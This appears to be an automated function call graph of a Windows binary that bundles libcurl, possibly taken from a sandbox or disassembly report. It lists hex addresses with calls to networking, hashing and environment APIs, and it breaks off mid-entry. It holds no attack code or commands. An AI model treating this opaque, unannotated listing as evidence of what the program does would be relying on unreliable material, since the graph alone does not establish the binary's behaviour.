6b8f8533 27774->27776 27803 6b8d14e0 27775->27803 27777 6b91db71 __fassign 5 API calls 27776->27777 27779 6b8f8560 27777->27779 27779->27762 27782 6b8f84e1 27782->27776 27783 6b8f8564 27782->27783 27822 6b8e7df0 27783->27822 27784 6b8f8473 27784->27782 27832 6b8f69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27784->27832 27787 6b8f8595 27789 6b8f863f curl_msnprintf 27787->27789 27792 6b8f86e9 27787->27792 27790 6b8f86a1 27789->27790 27833 6b8d24b0 85 API calls 27790->27833 27793 6b8e1bd0 83 API calls 27792->27793 27795 6b8f86d8 27793->27795 27794 6b8f86b3 27794->27795 27796 6b9006b0 74 API calls 27794->27796 27828 6b9280b5 27795->27828 27796->27795 27798 6b8e1ce0 106 API calls 27799 6b8f8743 27798->27799 27800 6b91db71 __fassign 5 API calls 27799->27800 27801 6b8f8755 27800->27801 27801->27762 27804 6b8d1506 27803->27804 27805 6b8d14f1 27803->27805 27808 6b8d1649 27804->27808 27809 6b8d15d0 EnterCriticalSection LeaveCriticalSection 27804->27809 27805->27804 27806 6b8d14f6 27805->27806 27834 6b8d9160 WaitForSingleObjectEx CloseHandle 27806->27834 27808->27784 27831 6b8fc6d0 94 API calls 27808->27831 27811 6b8d15fd 27809->27811 27812 6b8d1609 27809->27812 27810 6b8d14fc 27810->27804 27835 6b8d9150 CloseHandle 27811->27835 27814 6b8d160e 27812->27814 27815 6b8d1617 27812->27815 27836 6b8d9160 WaitForSingleObjectEx CloseHandle 27814->27836 27837 6b8d1670 DeleteCriticalSection closesocket ___scrt_fastfail 27815->27837 27816 6b8d1604 27819 6b8d1620 27816->27819 27821 6b8d1641 closesocket 27819->27821 27820 6b8d1614 27820->27815 27821->27808 27825 6b8e7e0d 27822->27825 27827 6b8e7e32 27822->27827 27823 6b91db71 __fassign 5 API calls 27824 6b8e7e7a 27823->27824 27824->27787 27825->27827 27838 6b926edc 26 API calls 27825->27838 27827->27823 27829 6b92f7ea _free 14 API calls 27828->27829 27830 6b8f8733 27829->27830 27830->27798 27831->27784 27832->27782 27833->27794 27834->27810 27835->27816 27836->27820 27837->27819 27838->27827 27889 6b8d9ba0 curl_slist_free_all curl_slist_free_all curl_maprintf curl_getenv 27890 6b8daca0 91 API calls 27891 6b8dc4a0 106 API calls 26478 6b930ebd 26479 6b930efb 26478->26479 26483 6b930ecb __dosmaperr 26478->26483 26486 6b921f49 14 API calls __dosmaperr 26479->26486 26481 6b930ee6 RtlAllocateHeap 26482 6b930ef9 26481->26482 26481->26483 26483->26479 26483->26481 26485 6b9348a6 EnterCriticalSection LeaveCriticalSection __dosmaperr 26483->26485 26485->26483 26486->26482 27892 6b8f21a0 CryptHashData 27894 6b8f7ea0 138 API calls 27134 6b8ea9b0 27135 6b91cee0 76 API calls 27134->27135 27136 6b8ea9c1 27135->27136 27898 6b8e78b0 7 API calls 27899 6b8eadb0 75 API calls __fassign 27900 6b8f13b0 111 API calls 26461 6b8d9bc0 26462 6b8d9bd6 26461->26462 26463 6b8d9bcd 26461->26463 26466 6b8d9be6 26462->26466 26467 6b8e21a0 26462->26467 26475 6b8da2a0 31 API calls 26463->26475 26474 6b92f78d 14 API calls 26467->26474 26468 6b8e21ba 26468->26466 26469 6b8e21b1 26469->26468 26476 6b91cb20 curl_getenv 26469->26476 26471 6b8e2383 26477 6b8e6db0 curl_slist_free_all 26471->26477 26473 6b8e2442 26473->26466 26474->26469 26475->26462 26476->26471 26477->26473 27904 6b8ddbc0 195 API calls __fassign 27905 6b8d29c0 recv 27908 6b8f21c0 CryptGetHashParam CryptGetHashParam CryptDestroyHash CryptReleaseContext 27909 6b91e4c2 17 API calls 5 library calls 26703 6b8d16d0 curl_msnprintf 26719 6b8d6e10 getaddrinfo 26703->26719 26706 6b8d1739 EnterCriticalSection 26710 6b8d1747 LeaveCriticalSection 26706->26710 26711 6b8d1763 26706->26711 26707 6b8d1722 WSAGetLastError 26708 6b8d172c 26707->26708 26709 6b8d1728 WSAGetLastError 26707->26709 26708->26706 26709->26708 26725 6b8d1670 DeleteCriticalSection closesocket ___scrt_fastfail 26710->26725 26712 6b8d176b send 26711->26712 26713 6b8d1787 LeaveCriticalSection 26711->26713 26712->26713 26715 6b8d1782 WSAGetLastError 26712->26715 26716 6b8d1755 26713->26716 26715->26713 26717 6b91db71 __fassign 5 API calls 26716->26717 26718 6b8d17a5 26717->26718 26723 6b8d1713 26719->26723 26724 6b8d6e3f __fassign 26719->26724 26720 6b8d6f93 WSASetLastError 26720->26723 26721 6b8d6f4b freeaddrinfo 26722 6b8d6f52 26721->26722 26722->26720 26722->26723 26723->26706 26723->26707 26724->26720 26724->26721 26724->26722 26725->26716 26726 6b8dbdd0 26727 6b8dbe19 26726->26727 26728 6b8dbdf1 26726->26728 26755 6b8dd3d0 76 API calls 3 library calls 26727->26755 26754 6b8e0900 77 API calls _strrchr 26728->26754 26731 6b8dbdf6 26738 6b8dbe0f 26731->26738 26741 6b8de4e0 193 API calls 26731->26741 26733 6b8dbe9b 26733->26738 26742 6b8fb380 106 API calls 26733->26742 26735 6b8dbeb2 26736 6b9006b0 74 API calls 26735->26736 26737 6b8dbed9 26736->26737 26737->26738 26743 6b8dd1b0 26737->26743 26740 6b8dbef5 26741->26733 26742->26735 26744 6b8dd1cb 26743->26744 26745 6b8dd212 26743->26745 26756 6b8dc650 26744->26756 26746 6b8dd23d 26745->26746 26793 6b90f7a0 76 API calls 26745->26793 26746->26740 26749 6b8dd1d5 26749->26745 26751 6b8dd1de 26749->26751 26750 6b8dd22c 26750->26740 26752 6b8dd1f0 26751->26752 26792 6b8d28e0 closesocket 26751->26792 26752->26740 26754->26731 26755->26731 26757 6b8dc6db 26756->26757 26758 6b8dc677 26756->26758 26759 6b8eee30 163 API calls 26757->26759 26760 6b8dc699 26758->26760 26761 6b8dc684 26758->26761 26765 6b8dc6e3 26759->26765 26794 6b8d2d20 26760->26794 26846 6b8eed60 163 API calls 26761->26846 26764 6b8dc6a5 26764->26757 26767 6b8dc6ae 26764->26767 26769 6b8dc740 26765->26769 26791 6b8dc855 26765->26791 26848 6b8fb380 106 API calls 26765->26848 26766 6b8dc690 26766->26749 26767->26791 26847 6b8dd2d0 78 API calls 26767->26847 26770 6b8dc894 26769->26770 26771 6b8dc780 26769->26771 26769->26791 26856 6b90f7a0 76 API calls 26770->26856 26773 6b8dc789 26771->26773 26774 6b8dc7e3 26771->26774 26849 6b8dcf60 107 API calls 26773->26849 26787 6b8dc7ec 26774->26787 26852 6b8d8160 47 API calls 26774->26852 26776 6b8dc6d2 26776->26749 26779 6b8dc793 26781 6b8dc7c9 26779->26781 26850 6b8dcb00 80 API calls __fassign 26779->26850 26781->26749 26782 6b8dc84e 26782->26791 26855 6b8dc8c0 106 API calls 26782->26855 26785 6b8dc7af 26785->26781 26851 6b8dcec0 86 API calls 26785->26851 26786 6b8dc80c 26786->26782 26786->26787 26788 6b8dc83e 26786->26788 26787->26782 26854 6b8dd360 193 API calls 26787->26854 26853 6b8dd360 193 API calls 26788->26853 26791->26749 26792->26752 26793->26750 26795 6b8d2d6a 26794->26795 26796 6b8d2d80 26794->26796 26798 6b91db71 __fassign 5 API calls 26795->26798 26797 6b90e5d0 2 API calls 26796->26797 26802 6b8d2d8c 26797->26802 26799 6b8d2d7c 26798->26799 26799->26764 26800 6b8d32c4 26883 6b9005d0 74 API calls __fassign 26800->26883 26802->26800 26804 6b8d2e4c 26802->26804 26803 6b8d32cf 26806 6b91db71 __fassign 5 API calls 26803->26806 26805 6b8d2e55 26804->26805 26845 6b8d2e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 26804->26845 26807 6b8d3f40 202 API calls 26805->26807 26808 6b8d32e4 26806->26808 26809 6b8d2e68 26807->26809 26808->26764 26811 6b8d2e84 26809->26811 26814 6b8d4060 92 API calls 26809->26814 26810 6b9003a0 16 API calls 26810->26845 26812 6b91db71 __fassign 5 API calls 26811->26812 26815 6b8d2e96 26812->26815 26813 6b8d32af 26817 6b91db71 __fassign 5 API calls 26813->26817 26814->26811 26815->26764 26816 6b8d3130 26816->26813 26879 6b8d46a0 205 API calls 26816->26879 26819 6b8d32c0 26817->26819 26819->26764 26820 6b8d4740 SleepEx getsockopt WSAGetLastError 26820->26845 26821 6b8d3160 26821->26795 26829 6b8d316d 26821->26829 26822 6b8d3025 WSASetLastError 26822->26845 26823 6b8d31dd 26857 6b8d3f40 26823->26857 26824 6b8d3185 26824->26823 26880 6b8d28e0 closesocket 26824->26880 26828 6b8d31f9 26828->26803 26833 6b8d320c 26828->26833 26881 6b90a0e0 53 API calls 3 library calls 26829->26881 26831 6b8d326a 26882 6b9005d0 74 API calls __fassign 26831->26882 26869 6b8d4060 26833->26869 26835 6b8d46a0 205 API calls 26835->26845 26838 6b8d3288 26838->26813 26841 6b8d3297 26838->26841 26839 6b9006b0 74 API calls 26839->26845 26840 6b91db71 __fassign 5 API calls 26842 6b8d3226 26840->26842 26843 6b91db71 __fassign 5 API calls 26841->26843 26842->26764 26844 6b8d32ab 26843->26844 26844->26764 26845->26810 26845->26816 26845->26820 26845->26822 26845->26824 26845->26835 26845->26839 26877 6b8e8450 21 API calls 26845->26877 26878 6b90a0e0 53 API calls 3 library calls 26845->26878 26846->26766 26847->26776 26848->26769 26849->26779 26850->26785 26851->26781 26852->26786 26853->26782 26854->26782 26855->26781 26856->26791 26858 6b8d403b 26857->26858 26859 6b8d3f54 26857->26859 26858->26828 26860 6b8d3fcd 26859->26860 26861 6b8d4023 26859->26861 26862 6b8d3fd4 26860->26862 26863 6b8d3ff1 26860->26863 26886 6b9005d0 74 API calls __fassign 26861->26886 26884 6b9075d0 201 API calls 2 library calls 26862->26884 26885 6b906f40 189 API calls __fassign 26863->26885 26867 6b8d402f 26867->26828 26868 6b8d3fec 26868->26828 26870 6b8d408d 26869->26870 26871 6b8d4080 26869->26871 26887 6b8d36a0 26870->26887 26873 6b8fcc20 2 API calls 26871->26873 26873->26870 26874 6b8d409d 26937 6b8e28a0 74 API calls 26874->26937 26876 6b8d3214 26876->26840 26877->26845 26878->26845 26879->26821 26880->26823 26881->26831 26882->26838 26883->26803 26884->26868 26885->26868 26886->26867 26888 6b8d38bf 26887->26888 26889 6b8d36c6 26887->26889 26890 6b91db71 __fassign 5 API calls 26888->26890 26889->26888 26892 6b8d36e0 getpeername 26889->26892 26891 6b8d3999 26890->26891 26891->26874 26893 6b8d3708 WSAGetLastError 26892->26893 26894 6b8d3743 ___scrt_fastfail 26892->26894 26938 6b90a0e0 53 API calls 3 library calls 26893->26938 26897 6b8d3760 getsockname 26894->26897 26896 6b8d3722 26939 6b9005d0 74 API calls __fassign 26896->26939 26899 6b8d377c WSAGetLastError 26897->26899 26900 6b8d37b7 26897->26900 26940 6b90a0e0 53 API calls 3 library calls 26899->26940 26942 6b8d2840 26900->26942 26902 6b8d372f 26905 6b91db71 __fassign 5 API calls 26902->26905 26904 6b8d37d7 26908 6b8d37de 26904->26908 26909 6b8d3820 26904->26909 26910 6b8d373f 26905->26910 26906 6b8d3796 26941 6b9005d0 74 API calls __fassign 26906->26941 26954 6b921f49 14 API calls __dosmaperr 26908->26954 26912 6b8d2840 23 API calls 26909->26912 26910->26874 26911 6b8d37a3 26914 6b91db71 __fassign 5 API calls 26911->26914 26915 6b8d3876 26912->26915 26917 6b8d37b3 26914->26917 26915->26888 26918 6b8d387d 26915->26918 26916 6b8d37e3 26955 6b921f49 14 API calls __dosmaperr 26916->26955 26917->26874 26958 6b921f49 14 API calls __dosmaperr 26918->26958 26921 6b8d37ea 26956 6b90a0e0 53 API calls 3 library calls 26921->26956 26922 6b8d3882 26959 6b921f49 14 API calls __dosmaperr 26922->26959 26925 6b8d37fe 26957 6b9005d0 74 API calls __fassign 26925->26957 26926 6b8d3889 26960 6b90a0e0 53 API calls 3 library calls 26926->26960 26929 6b8d380c 26930 6b91db71 __fassign 5 API calls 26929->26930 26932 6b8d381c 26930->26932 26931 6b8d389d 26961 6b9005d0 74 API calls __fassign 26931->26961 26932->26874 26934 6b8d38ab 26935 6b91db71 __fassign 5 API calls 26934->26935 26936 6b8d38bb 26935->26936 26936->26874 26937->26876 26938->26896 26939->26902 26940->26906 26941->26911 26943 6b8d2886 26942->26943 26944 6b8d2853 26942->26944 26963 6b8f1080 21 API calls __dosmaperr 26943->26963 26945 6b8d28b4 26944->26945 26962 6b8f1080 21 API calls __dosmaperr 26944->26962 26964 6b921f49 14 API calls __dosmaperr 26945->26964 26948 6b8d2894 26948->26945 26951 6b8d289b htons 26948->26951 26950 6b8d2866 26950->26945 26953 6b8d286d htons 26950->26953 26951->26904 26952 6b8d28c5 26952->26904 26953->26904 26954->26916 26955->26921 26956->26925 26957->26929 26958->26922 26959->26926 26960->26931 26961->26934 26962->26950 26963->26948 26964->26952 26965 6b91e5cc 94 API calls 4 library calls 27911 6b8dd8e0 119 API calls _strstr 27912 6b8d7de0 gethostname ___from_strstr_to_strchr 27913 6b8da4e0 curl_msnprintf 27914 6b8ef6e0 75 API calls 27916 6b8f81e0 140 API calls 27917 6b8f48e0 curl_mvaprintf 26659 6b9007e0 recv 26660 6b9007fb WSAGetLastError 26659->26660 26661 6b90081e 26659->26661 27918 6b8d7bf0 5 API calls ___scrt_fastfail 27919 6b8d9ff0 107 API calls ___scrt_fastfail 27137 6b8e83f0 27138 6b8e8402 27137->27138 27143 6b8e26a0 27138->27143 27140 6b8e843f 27141 6b8e841b 27141->27140 27166 6b8e1bd0 27141->27166 27144 6b8fcc20 2 API calls 27143->27144 27145 6b8e26b9 27144->27145 27146 6b8e26c8 27145->27146 27147 6b8e272c 27145->27147 27150 6b8e26f9 curl_maprintf 27145->27150 27146->27141 27148 6b90e5d0 2 API calls 27147->27148 27149 6b8e2749 27148->27149 27152 6b8e275f 27149->27152 27153 6b8e2784 27149->27153 27150->27147 27151 6b8e2720 27150->27151 27151->27141 27180 6b8d2a60 27152->27180 27155 6b8fcc20 2 API calls 27153->27155 27157 6b8e2790 27155->27157 27156 6b8e2772 27158 6b8e277d 27156->27158 27160 6b90e5d0 2 API calls 27156->27160 27159 6b8e27b4 27157->27159 27161 6b8fcc20 2 API calls 27157->27161 27158->27141 27162 6b8d36a0 88 API calls 27159->27162 27163 6b8e283f 27160->27163 27161->27159 27164 6b8e27cd 27162->27164 27163->27141 27164->27156 27165 6b9006b0 74 API calls 27164->27165 27165->27156 27167 6b8e1be4 27166->27167 27168 6b9006b0 74 API calls 27167->27168 27178 6b8e1cc7 27167->27178 27169 6b8e1c5c 27168->27169 27299 6b8d1000 27169->27299 27171 6b8e1c62 27172 6b8e1c88 27171->27172 27314 6b8d28e0 closesocket 27171->27314 27174 6b8e1c9d 27172->27174 27315 6b8d28e0 closesocket 27172->27315 27176 6b8e1cb2 27174->27176 27316 6b8d28e0 closesocket 27174->27316 27176->27178 27317 6b8d28e0 closesocket 27176->27317 27178->27140 27181 6b8d2a9d 27180->27181 27182 6b90e5d0 2 API calls 27181->27182 27184 6b8d2ac8 27182->27184 27183 6b8d2c83 27282 6b9005d0 74 API calls __fassign 27183->27282 27184->27183 27192 6b8d2b15 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27184->27192 27186 6b8d2c90 27186->27156 27187 6b8d2c55 27191 6b8d2c59 27187->27191 27281 6b8f69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27187->27281 27189 6b8d2c77 27189->27156 27191->27156 27192->27187 27193 6b8d40c0 27192->27193 27194 6b8d4138 __fassign 27193->27194 27195 6b8d41af socket 27194->27195 27201 6b8d417c 27194->27201 27195->27201 27196 6b8d4512 27198 6b91db71 __fassign 5 API calls 27196->27198 27197 6b8d41e3 27200 6b8d2840 23 API calls 27197->27200 27202 6b8d4524 27198->27202 27203 6b8d420b 27200->27203 27201->27196 27201->27197 27284 6b8fa660 ioctlsocket 27201->27284 27202->27192 27204 6b8d4267 27203->27204 27205 6b8d4212 27203->27205 27206 6b9006b0 74 API calls 27204->27206 27285 6b921f49 14 API calls __dosmaperr 27205->27285 27209 6b8d427c 27206->27209 27208 6b8d4217 27286 6b921f49 14 API calls __dosmaperr 27208->27286 27211 6b8d42fb 27209->27211 27213 6b8d42a8 setsockopt 27209->27213 27226 6b8d433a 27211->27226 27291 6b914f30 11 API calls 2 library calls 27211->27291 27212 6b8d421e 27287 6b90a0e0 53 API calls 3 library calls 27212->27287 27213->27211 27215 6b8d42d2 WSAGetLastError 27213->27215 27290 6b90a0e0 53 API calls 3 library calls 27215->27290 27216 6b8d4232 27288 6b9005d0 74 API calls __fassign 27216->27288 27220 6b8d435e getsockopt 27222 6b8d438f setsockopt 27220->27222 27223 6b8d4381 27220->27223 27221 6b8d4341 27228 6b8d43c3 setsockopt 27221->27228 27234 6b8d43f4 27221->27234 27222->27221 27223->27221 27223->27222 27224 6b8d42ea 27229 6b9006b0 74 API calls 27224->27229 27225 6b8d4245 27289 6b8d28e0 closesocket 27225->27289 27226->27220 27226->27221 27227 6b8d44bf 27233 6b8d44d6 27227->27233 27237 6b8d454c 27227->27237 27231 6b8d43e8 27228->27231 27240 6b8d43fc 27228->27240 27229->27211 27235 6b9006b0 74 API calls 27231->27235 27232 6b8d4251 27236 6b91db71 __fassign 5 API calls 27232->27236 27292 6b8d39a0 185 API calls 2 library calls 27233->27292 27234->27227 27255 6b8d452c 27234->27255 27235->27234 27238 6b8d4263 27236->27238 27283 6b8fa660 ioctlsocket 27237->27283 27238->27192 27244 6b8d442e WSAIoctl 27240->27244 27242 6b8d4554 27243 6b90e5d0 2 API calls 27242->27243 27247 6b8d4560 27243->27247 27244->27234 27248 6b8d446b WSAGetLastError 27244->27248 27245 6b8d44f0 27245->27237 27246 6b8d44fd 27245->27246 27293 6b8d28e0 closesocket 27246->27293 27250 6b8d459e 27247->27250 27295 6b8f69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27247->27295 27251 6b9006b0 74 API calls 27248->27251 27254 6b8d467b 27250->27254 27257 6b8d45bb 27250->27257 27251->27234 27252 6b8d4504 27252->27196 27259 6b91db71 __fassign 5 API calls 27254->27259 27294 6b8d28e0 closesocket 27255->27294 27256 6b8d458a 27296 6b8f69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 27256->27296 27261 6b8d4604 WSAGetLastError 27257->27261 27262 6b8d45c4 connect 27257->27262 27264 6b8d4692 27259->27264 27265 6b8d4615 27261->27265 27266 6b8d4660 27261->27266 27262->27261 27267 6b8d45dd 27262->27267 27263 6b8d4533 27268 6b91db71 __fassign 5 API calls 27263->27268 27264->27192 27265->27266 27269 6b8d4623 27265->27269 27270 6b91db71 __fassign 5 API calls 27266->27270 27267->27196 27271 6b8d45eb 27267->27271 27272 6b8d4548 27268->27272 27297 6b90a0e0 53 API calls 3 library calls 27269->27297 27274 6b8d4677 27270->27274 27275 6b91db71 __fassign 5 API calls 27271->27275 27272->27192 27274->27192 27277 6b8d4600 27275->27277 27276 6b8d4635 27278 6b9006b0 74 API calls 27276->27278 27277->27192 27279 6b8d4645 27278->27279 27298 6b8d28e0 closesocket 27279->27298 27281->27189 27282->27186 27283->27242 27284->27197 27285->27208 27286->27212 27287->27216 27288->27225 27289->27232 27290->27224 27291->27226 27292->27245 27293->27252 27294->27263 27295->27256 27296->27250 27297->27276 27298->27196 27300 6b8d15c0 27299->27300 27301 6b8d15d0 EnterCriticalSection LeaveCriticalSection 27300->27301 27305 6b8d1649 27300->27305 27302 6b8d15fd 27301->27302 27303 6b8d1609 27301->27303 27318 6b8d9150 CloseHandle 27302->27318 27306 6b8d160e 27303->27306 27307 6b8d1617 27303->27307 27305->27171 27319 6b8d9160 WaitForSingleObjectEx CloseHandle 27306->27319 27320 6b8d1670 DeleteCriticalSection closesocket ___scrt_fastfail 27307->27320 27308 6b8d1604 27311 6b8d1620 27308->27311 27313 6b8d1641 closesocket 27311->27313 27312 6b8d1614 27312->27307 27313->27305 27314->27172 27315->27174 27316->27176 27317->27178 27318->27308 27319->27312 27320->27311 27920 6b8dbc00 curl_formfree 27921 6b8d9c00 78 API calls __fassign 27923 6b8f8300 26 API calls 27925 6b91d900 curl_getenv 27926 6b8de710 193 API calls 27927 6b8da610 47 API calls 27928 6b8dae10 115 API calls 2 library calls 27929 6b8e6310 GetEnvironmentVariableA 27931 6b8ef510 107 API calls 27932 6b8e2c10 87 API calls 27934 6b8f0c10 89 API calls __fassign 27935 6b8da720 curl_easy_escape 27936 6b8dbf20 110 API calls 26487 6b8ea820 26488 6b8ea843 26487->26488 26503 6b8eee30 26488->26503 26490 6b8ea975 26491 6b91db71 __fassign 5 API calls 26490->26491 26492 6b8ea986 26491->26492 26493 6b8ea84b 26493->26490 26494 6b8ea933 26493->26494 26496 6b8ea8ba curl_msnprintf 26493->26496 26494->26490 26523 6b91cee0 26494->26523 26499 6b8ea902 26496->26499 26497 6b8ea94f 26497->26490 26498 6b8ea958 26497->26498 26532 6b91db71 26498->26532 26499->26490 26531 6b8eaee0 72 API calls __fassign 26499->26531 26502 6b8ea971 26504 6b8eee5d 26503->26504 26510 6b8eeea1 ___scrt_fastfail 26503->26510 26505 6b91cee0 76 API calls 26504->26505 26504->26510 26507 6b8eee72 26505->26507 26506 6b91db71 __fassign 5 API calls 26508 6b8ef063 26506->26508 26509 6b8eee7f 26507->26509 26507->26510 26508->26493 26511 6b91db71 __fassign 5 API calls 26509->26511 26514 6b8eef7a 26510->26514 26516 6b8ef035 26510->26516 26518 6b8eef8e 26510->26518 26539 6b9006b0 26510->26539 26512 6b8eee9d 26511->26512 26512->26493 26514->26516 26517 6b8ef022 26514->26517 26516->26506 26520 6b91db71 __fassign 5 API calls 26517->26520 26549 6b8ee330 163 API calls ___from_strstr_to_strchr 26518->26549 26519 6b8eefd5 26519->26514 26521 6b9006b0 74 API calls 26519->26521 26522 6b8ef031 26520->26522 26521->26514 26522->26493 26524 6b91cef8 26523->26524 26525 6b91cf2f 26524->26525 26527 6b91cf85 26524->26527 26529 6b91cf36 26524->26529 26554 6b9005d0 74 API calls __fassign 26525->26554 26527->26497 26528 6b91cf6d 26528->26497 26529->26528 26551 6b8fcc20 26529->26551 26531->26494 26533 6b91db7a 26532->26533 26534 6b91db7c IsProcessorFeaturePresent 26532->26534 26533->26502 26536 6b91dc76 26534->26536 26559 6b91dc3a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26536->26559 26538 6b91dd59 26538->26502 26540 6b9006cf 26539->26540 26547 6b900759 26539->26547 26542 6b9006dc curl_mvsnprintf 26540->26542 26540->26547 26541 6b91db71 __fassign 5 API calls 26543 6b900767 26541->26543 26544 6b900737 26542->26544 26545 6b9006fe curl_msnprintf 26542->26545 26543->26518 26550 6b900550 72 API calls 26544->26550 26545->26544 26547->26541 26549->26519 26550->26547 26555 6b90e5d0 26551->26555 26553 6b8fcc35 26553->26528 26554->26527 26556 6b90e5e0 QueryPerformanceCounter 26555->26556 26557 6b90e642 GetTickCount 26555->26557 26558 6b90e603 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 26556->26558 26557->26553 26558->26553 26559->26538 27937 6b8ef720 74 API calls 27938 6b8f8320 WSASetEvent 27939 6b8f3920 curl_slist_free_all curl_slist_free_all 26662 6b900c20 26665 6b9009f0 26662->26665 26664 6b900c45 26666 6b900a54 26665->26666 26667 6b900b1a send 26665->26667 26666->26667 26688 6b9003a0 26666->26688 26668 6b900b3e WSAGetLastError 26667->26668 26679 6b900b8e 26667->26679 26670 6b900b69 26668->26670 26671 6b900b4e 26668->26671 26669 6b91db71 __fassign 5 API calls 26672 6b900bb4 26669->26672 26700 6b90a0e0 53 API calls 3 library calls 26670->26700 26674 6b91db71 __fassign 5 API calls 26671->26674 26672->26664 26676 6b900b65 26674->26676 26676->26664 26677 6b900b7b 26701 6b9005d0 74 API calls __fassign 26677->26701 26679->26669 26680 6b900abe 26682 6b900b13 26680->26682 26683 6b900af5 recv 26680->26683 26681 6b900a85 26681->26667 26681->26680 26685 6b900ad1 26681->26685 26682->26667 26683->26667 26684 6b900b0e 26683->26684 26684->26667 26686 6b91db71 __fassign 5 API calls 26685->26686 26687 6b900ae7 26686->26687 26687->26664 26689 6b9003c0 26688->26689 26691 6b9003e7 26688->26691 26690 6b9003c9 26689->26690 26689->26691 26702 6b9004d0 WSASetLastError Sleep 26690->26702 26693 6b8ffef0 14 API calls 26691->26693 26699 6b900431 26693->26699 26694 6b9003d4 26695 6b91db71 __fassign 5 API calls 26694->26695 26696 6b9003e3 26695->26696 26696->26681 26697 6b91db71 __fassign 5 API calls 26698 6b9004c0 26697->26698 26698->26681 26699->26697 26700->26677 26701->26679 26702->26694 26966 6b8d9e30 26967 6b8d9e3e 26966->26967 26968 6b8d9e46 26966->26968 26969 6b8d9e59 26968->26969 26970 6b8d9e71 26968->26970 26991 6b9005d0 74 API calls __fassign 26969->26991 26972 6b8d9e82 26970->26972 26984 6b8f6da0 26970->26984 26974 6b8d9eab curl_multi_setopt curl_multi_add_handle 26972->26974 26975 6b8d9e8b 26972->26975 26977 6b8d9eca curl_multi_cleanup 26974->26977 26981 6b8d9ef1 26974->26981 26976 6b8d9e64 26978 6b8d9ef7 curl_multi_poll 26979 6b8d9f50 curl_multi_remove_handle 26978->26979 26980 6b8d9f11 curl_multi_perform 26978->26980 26980->26979 26980->26981 26981->26978 26981->26979 26982 6b8d9f29 curl_multi_info_read 26981->26982 26982->26981 26983 6b8d9f3a curl_multi_remove_handle 26982->26983 26985 6b8f6db1 26984->26985 26987 6b8f6dba 26985->26987 26992 6b8d2370 curl_easy_init 26985->26992 26987->26972 26988 6b8f6e06 26988->26987 26998 6b8e8a20 26988->26998 26990 6b8f6e44 WSACreateEvent 26990->26987 26991->26976 26993 6b8d2387 26992->26993 26995 6b8d2390 26992->26995 26993->26988 26994 6b8d23c2 26994->26988 26995->26994 27005 6b8e1650 26995->27005 26999 6b8e8a2a 26998->26999 27000 6b8e8a37 socket 26998->27000 26999->26990 27001 6b8e8a4c 27000->27001 27002 6b8e8a48 27000->27002 27038 6b8d28e0 closesocket 27001->27038 27002->26990 27004 6b8e8a54 27004->26990 27006 6b8e165f 27005->27006 27025 6b8d23b8 27005->27025 27006->27025 27027 6b8f6bd0 27006->27027 27008 6b8e1675 27009 6b8e167f curl_multi_remove_handle 27008->27009 27010 6b8e1689 27008->27010 27009->27010 27011 6b8e1690 curl_multi_cleanup 27010->27011 27012 6b8e16a0 27010->27012 27011->27012 27033 6b8e1ce0 27012->27033 27014 6b8e16d9 27015 6b91d050 curl_slist_free_all 27014->27015 27017 6b8e1711 27015->27017 27016 6b8e5320 curl_url_cleanup 27018 6b8e1759 27016->27018 27017->27016 27019 6b8d6520 99 API calls 27018->27019 27020 6b8e1799 27019->27020 27021 6b8e18fe curl_slist_free_all 27020->27021 27022 6b8e1915 27021->27022 27023 6b8e1d40 curl_slist_free_all curl_slist_free_all 27022->27023 27024 6b8e191b 27023->27024 27026 6b9280b5 14 API calls 27024->27026 27025->26988 27026->27025 27028 6b8f6be2 27027->27028 27032 6b8f6c24 27027->27032 27028->27032 27037 6b909660 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27028->27037 27030 6b8f6c11 27031 6b9006b0 74 API calls 27030->27031 27030->27032 27031->27032 27032->27008 27034 6b8e1cf3 27033->27034 27035 6b8e1650 106 API calls 27034->27035 27036 6b8e1d1f 27035->27036 27037->27030 27038->27004 27321 6b8e1930 27322 6b8e194e 27321->27322 27323 6b8e1650 106 API calls 27322->27323 27324 6b8e197a 27323->27324 27325 6b8e1650 106 API calls 27324->27325 27326 6b8e1986 ___scrt_fastfail 27325->27326 27353 6b8e2ea0 27326->27353 27328 6b8e1a5e 27329 6b8e19d1 27328->27329 27337 6b8e1bd0 83 API calls 27328->27337 27330 6b8e19b8 27330->27328 27330->27329 27331 6b8fcc20 2 API calls 27330->27331 27333 6b8e19f8 27331->27333 27332 6b8e1a0a 27333->27332 27334 6b8e1a66 27333->27334 27338 6b8e1a37 curl_maprintf 27333->27338 27335 6b90e5d0 2 API calls 27334->27335 27336 6b8e1a83 27335->27336 27339 6b8e1acb 27336->27339 27340 6b8e1a99 27336->27340 27337->27329 27338->27328 27338->27334 27342 6b8fcc20 2 API calls 27339->27342 27341 6b8d2a60 205 API calls 27340->27341 27343 6b8e1aac 27341->27343 27344 6b8e1ad7 27342->27344 27343->27328 27345 6b8e1b7d 27343->27345 27346 6b8e1afb 27344->27346 27348 6b8fcc20 2 API calls 27344->27348 27347 6b90e5d0 2 API calls 27345->27347 27349 6b8d36a0 88 API calls 27346->27349 27350 6b8e1b89 27347->27350 27348->27346 27351 6b8e1b17 27349->27351 27351->27345 27352 6b9006b0 74 API calls 27351->27352 27352->27345 27354 6b8e2ed5 27353->27354 27355 6b8e2ef8 27354->27355 27356 6b8e2f10 27354->27356 27357 6b91db71 __fassign 5 API calls 27355->27357 27450 6b8e2910 27356->27450 27359 6b8e2f0c 27357->27359 27359->27330 27360 6b8e2f16 27361 6b8e2f1f 27360->27361 27460 6b8e4aa0 27360->27460 27362 6b91db71 __fassign 5 API calls 27361->27362 27364 6b8e2f33 27362->27364 27364->27330 27365 6b91db71 __fassign 5 API calls 27367 6b8e370c 27365->27367 27367->27330 27368 6b8e2f40 27368->27361 27406 6b8e3251 27368->27406 27500 6b8e3a10 27368->27500 27369 6b8e2fe4 27533 6b8e4190 27369->27533 27371 6b8e2fac curl_msnprintf curl_url_set 27371->27361 27371->27369 27375 6b8e308e 27375->27406 27551 